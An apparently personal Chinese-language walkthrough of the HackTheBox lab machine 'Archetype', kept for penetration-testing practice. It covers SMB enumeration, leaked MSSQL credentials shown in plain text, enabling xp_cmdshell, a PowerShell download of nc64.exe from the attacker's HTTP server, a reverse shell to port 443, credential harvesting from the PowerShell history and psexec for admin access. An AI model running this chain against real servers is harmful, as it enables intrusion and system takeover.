hackthebox靶场

nmap扫描
smbclient工具

开始

这是个很好的平台，可以有效锻炼渗透思维（就是没钱开会员。。）
信息收集：
    IP：10.129.27.251(关机自动换IP)
nmap扫描：
    nmap -T4 -sC -sV 10.129.27.251
主要信息：
    端口：
        135/tcp  open  msrpc        Microsoft Windows RPC
        139/tcp  open  netbios-ssn  
        445/tcp  open  microsoft-ds   smb共享服务
        1433/tcp open  ms-sql-s     mssql数据库：Microsoft SQL Server 2017 RTM
    系统：Windows Server 2019

smbclient动态库

使用

参数：
    -N：无密码
    -L：此选项允许您查看服务器上有什么可用的服务（扫描存在那些共享文件夹）
smbclient -N -L 10.129.27.251
后面有显示的都要密码

尝试无密码链接备份文件夹

smbclient -N \\\\10.129.27.251\\backups
登入成功

查看桌面

疑似配置文件

下载文件

查看文件

发现数据库的用户名与密码

连接数据库

我们需要一个连接和身份验证到MSSQL服务器的方法。
在impacket的mssqlclient.py工具可以帮助我们连接mssql数据库

impacker python类

配置完成
mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.27.251 -windows-auth //身份验证

查看权限

select is_srvrolemember('sysadmin')； //查看数据库当前权限
显示1，1=数据库当前最高权限

xp_cmdshell

在mssql数据库的2005之后是默认关闭的。
开启xp_cmdshell之后可以用来执行系统命令。

查看状态

可以通过查看用户名命令来测试
报错：没开启xp_cmdshell

开启xp_cmdshell

开启：

EXEC sp_configure 'show advanced options',1;//显示高级选项
reconfigure
EXEC sp_configure 'xp_cmdshell',1;
reconfigure

通过xp_cmdshell查看当前系统权限

开启http与nc监听

进入桌面：python3 -m http.server
nc监听：nc -lvnp 443

上传文件反弹shell

由于powershell有更多的功能，而且可以使用linux命令
所以接下来的步骤基本都是使用powershell命令
powershell查看当前文件夹

下载文件

由于当前用户是没有权限在当前文件夹写入为文件的，所以需要切换目录下载。
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://IP(10开头的那个)/nc64.exe -outfile nc64.exe"
发现网页有访问下载痕迹

获取shell成功

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe IP 443" //因为nc监听的端口就是443端口

查看权限

whoami

下载工具使用

使用powershell命令行
下载工具：wget http://ip/winquan.exe
发现目录文件,PowerShell的历史文件，它相当于 Linux 系统的 .bash_history文件。
他在这个目录下C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\

查看文件发现管理员账户与密码

type ConsoleHost_history.txt

使用impacker里面的工具脚本psexec.py工具以管理员身份获取shell

管理员权限